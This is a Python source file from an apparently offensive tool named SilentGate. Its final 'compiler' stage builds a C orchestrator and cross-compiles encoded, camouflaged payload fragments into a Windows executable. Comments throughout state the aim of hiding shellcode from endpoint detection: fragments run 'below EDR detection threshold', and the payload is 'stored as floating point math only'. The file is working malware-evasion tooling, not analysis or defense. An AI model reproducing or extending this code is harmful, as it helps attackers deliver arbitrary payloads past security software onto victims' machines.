"""
SilentGate - GENE 7: Compiler
INPUT  : fragments + gene5 reconstructor + metadata (GENE 6)
OUTPUT : compiled Windows executable
CONTRACT: final output of the DNA chain

Compiles all genes into one executable:
  - gene5_reconstructor.c (IDFT + matrix reconstruction)
  - fragment_00.c .. fragment_NN.c (temporal execution)
  - Links with: -lm (math) for cos/sin in IDFT
"""

import os
import sys
import json
import subprocess


MINGW_CC    = "x86_64-w64-mingw32-gcc"
COMPILE_FLAGS = ["-O2", "-masm=intel", "-lm", "-lpsapi"]


def build_orchestrator(fragments, metadata):
    """
    Generate main orchestrator that calls fragments in order.
    This is the entry point of the compiled executable.
    """
    n = metadata["n_fragments"]
    calls = []
    calls.append("    PVOID shared_mem = NULL;")
    calls.append(f"    shared_mem = sg_execute_fragment_0(&shared_mem);")
    for k in range(1, n):
        calls.append(f"    sg_execute_fragment_{k}(shared_mem);")
    calls_str = "\n".join(calls)

    # Forward declarations
    fwd = "extern PVOID sg_execute_fragment_0(PVOID* shared_mem);\n"
    for k in range(1, n):
        fwd += f"extern void sg_execute_fragment_{k}(PVOID mem);\n"

    return f"""/*
 * SilentGate - Main Orchestrator
 * Generated by GENE 7
 * Author: JarDani
 *
 * Chains {n} temporal fragments via Poisson schedule.
 * Each fragment operates below EDR detection threshold.
 */

#include <windows.h>
#include <stdio.h>

{fwd}

int main() {{
    printf("[SILENTGATE] Spectral Payload Executor\\n");
    printf("[SILENTGATE] Author: JarDani\\n");
    printf("[SILENTGATE] Fragments: {n}\\n\\n");

{calls_str}

    printf("\\n[SILENTGATE] All fragments executed\\n");
    printf("[SILENTGATE] Press any key to exit\\n");
    getchar();
    return 0;
}}
"""


def compile_all(fragments, metadata,
                reconstructor_path="output/gene5_reconstructor.c",
                fragments_dir="output/fragments",
                output_exe="output/silentgate_spectral.exe"):
    """
    Compile all C files into single executable.
    """
    os.makedirs("output", exist_ok=True)

    # Write orchestrator
    orchestrator_src = build_orchestrator(fragments, metadata)
    orch_path = "output/gene7_orchestrator.c"
    with open(orch_path, "w") as f:
        f.write(orchestrator_src)

    # Collect all source files
    sources = [reconstructor_path, orch_path]
    for frag in fragments:
        fpath = f"{fragments_dir}/fragment_{frag['id']:02d}.c"
        if os.path.exists(fpath):
            sources.append(fpath)

    # Compile command
    cmd = [MINGW_CC] + sources + ["-o", output_exe] + COMPILE_FLAGS

    print(f"[GENE 7] Compiling {len(sources)} source files...")
    print(f"         Command: {' '.join(cmd[:4])} ... {output_exe}")

    result = subprocess.run(cmd, capture_output=True, text=True)

    if result.returncode != 0:
        print(f"[GENE 7] Compile error:\n{result.stderr}")
        return False, result.stderr

    size = os.path.getsize(output_exe)
    print(f"[GENE 7] Compiled successfully: {output_exe}")
    print(f"[GENE 7] Executable size: {size:,} bytes")
    return True, output_exe


def save_metadata(metadata, fragments, path="output/gene7_metadata.json"):
    meta7 = {
        **metadata,
        "gene": 7,
        "output_contract": "compiled .exe — end of DNA chain",
        "n_sources": len(fragments) + 2,
    }
    with open(path, "w") as f:
        json.dump(meta7, f, indent=2)
    return meta7


if __name__ == "__main__":
    sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
    from core.gene1_payload_ingester       import ingest
    from core.gene2_dft_encoder            import encode
    from core.gene3_tensor_splitter        import split
    from core.gene4_eigenvalue_camouflager import camouflage
    from core.gene5_c_reconstructor_gen    import generate as gen_c
    from core.gene5_c_reconstructor_gen    import save_c_file
    from core.gene6_temporal_fragmenter    import generate as gen_frags
    from core.gene6_temporal_fragmenter    import save_fragments

    test_payload = bytes([
        0x55, 0x48, 0x89, 0xE5, 0x48, 0x83, 0xEC, 0x20,
        0x48, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0x48, 0x83,
        0xC4, 0x28, 0xC3
    ])

    print("[GENE 7] Running full DNA chain...")
    print("         GENE 1 → ingest")
    arr,   meta1 = ingest(test_payload, source_type="bytes")

    print("         GENE 2 → DFT encode")
    coeffs,meta2 = encode(arr, meta1)

    print("         GENE 3 → tensor split")
    G,A1,A2,meta3 = split(coeffs, meta2)

    print("         GENE 4 → eigenvalue camouflage")
    G_cam,A1_cam,A2_cam,G_n,A1_n,A2_n,meta4 = camouflage(G,A1,A2,meta3)

    print("         GENE 5 → generate C reconstructor")
    c_src = gen_c(G_cam,A1_cam,A2_cam,G_n,A1_n,A2_n,meta4)
    save_c_file(c_src)

    print("         GENE 6 → temporal fragment")
    fragments, meta6 = gen_frags(c_src, meta4)
    save_fragments(fragments)

    print("         GENE 7 → compile")
    success, result = compile_all(fragments, meta6)
    meta7 = save_metadata(meta6, fragments)

    print(f"\n[GENE 7] DNA CHAIN COMPLETE")
    print(f"         GENE 1 → uint8 array")
    print(f"         GENE 2 → complex DFT coefficients")
    print(f"         GENE 3 → SVD factor matrices G,A1,A2")
    print(f"         GENE 4 → eigenvalue camouflaged matrices")
    print(f"         GENE 5 → C reconstructor (float math only)")
    print(f"         GENE 6 → {meta6['n_fragments']} temporal fragments")
    print(f"         GENE 7 → compiled executable")
    print(f"\n[GENE 7] SUCCESS: {success}")
    if success:
        print(f"[GENE 7] OUTPUT : {result}")
        print(f"[GENE 7] No shellcode bytes in any source file")
        print(f"[GENE 7] Payload stored as floating point math only")
        print(f"[GENE 7] Execution temporally distributed via Poisson process")
